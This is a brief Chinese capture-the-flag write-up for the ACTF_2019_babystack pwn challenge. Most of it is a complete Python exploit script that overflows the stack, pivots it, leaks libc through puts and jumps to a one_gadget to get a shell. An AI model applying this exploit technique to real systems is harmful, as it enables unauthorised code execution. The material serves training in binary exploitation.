ACTF_2019_babystack

buuoj刷pwn题之ACTF_2019_babystack

漏洞明显，溢出rop，可溢出16个字节

栈迁移到变量s上，然后leak，onegadget一把梭

#coding=utf8

from PwnContext import *
      
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096,timeout=2:ctx.recv(numb, timeout=timeout)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\x00'))
uu64    = lambda data   :u64(data.ljust(8, '\x00'))
leak    = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))

ctx.binary = './ACTF_2019_babystack'
ctx.remote = ('0.0.0.0', 0)
ctx.remote_libc = '../../libc/libc-2.27.so'
ctx.debug_remote_libc = True
rs()
# rs('remote')
# print(ctx.libc.path)

size = 0xe0
start = 0x4008F6
leave_ret = 0x400a18
format_str = 0x400B58
pop_rdi_ret = 0x400ad3
pop_rsi_r15_ret = 0x400ad1


sla('>', str(size))
ru('saved at ')
stack_addr = int(ru('\n'), 16)
leak('stack_addr', stack_addr)

pay = ''  # ROP
pay += p64(stack_addr) # rbp
pay += p64(pop_rdi_ret) + p64(ctx.binary.got['puts'])
pay += p64(ctx.binary.plt['puts'])
pay += p64(start)
pay += '\x00' * (size - len(pay) - 0x10) + p64(stack_addr) + p64(leave_ret)

#dbg('b *' + hex(start))
#raw_input()
s(pay)

ru('Byebye~\n')
puts_addr = uu64(ru('\n'))
libc_base = puts_addr - ctx.libc.sym['puts']
onegadget = libc_base + 0x4f322

leak('puts', puts_addr)
leak('libc_base', libc_base)
leak('onegadget', onegadget)

sla('>', str(size))

pay = '\x00' * (size - 8) + p64(onegadget)
s(pay)


irt()